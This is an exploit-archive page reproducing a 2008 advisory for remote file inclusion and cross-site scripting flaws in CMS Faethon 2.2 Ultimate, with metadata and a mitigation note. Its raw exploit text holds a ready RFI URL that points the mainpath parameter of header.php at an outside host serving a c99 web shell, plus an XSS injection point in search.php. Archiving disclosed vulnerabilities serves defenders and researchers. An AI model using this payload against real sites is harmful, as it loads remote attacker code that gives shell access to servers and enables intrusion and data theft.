header-logo
Suggest Exploit
vendor:
CMS Faethon 2.2 Ultimate
by:
RoMaNcYxHaCkEr
7.5
CVSS
HIGH
RFI & XSS
94, 79
CWE
Product Name: CMS Faethon 2.2 Ultimate
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:cmsfaethon:cms_faethon_2.2_ultimate
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CMS Faethon 2.2 Ultimate Multiple Remote Vulnerabilies

The CMS Faethon 2.2 Ultimate is vulnerable to remote file inclusion and cross-site scripting. The remote file inclusion vulnerability can be exploited by sending a malicious URL to the mainpath parameter in the header.php file. The cross-site scripting vulnerability can be exploited by sending a malicious script to the what and where parameters in the search.php file.

Mitigation:

The vendor has released a patch to address these vulnerabilities. Users should upgrade to the latest version of CMS Faethon 2.2 Ultimate.
Source

Exploit-DB raw data:

-==========================================[ ViVa Islam + YeMeN ]====================================-

# Name : CMS Faethon 2.2 Ultimate Multiple Remote Vulnerabilies

# Download From : http://cmsfaethon.org

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )        

# Home Page :  WwW.4RxH.CoM            

+======================================================================================================================+

# Exploits :

1- RFI :

http://WwW.4RxH.CoM/22_ultimate/templates/header.php?mainpath=http://rxh.freehostia.com/shells/c99in.txt?

2- XSS :

http://WwW.4RxH.CoM/22_ultimate/search.php?what=&where=articles

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum & Anyone Hate Me  :) 

# For Contact : webmaster@4rxh.com

# bEST wISHES

-==========================================[ ViVa Islam + YeMeN ]====================================-

# milw0rm.com [2008-05-07]

Navigation

Suggest Exploit

Services By CQR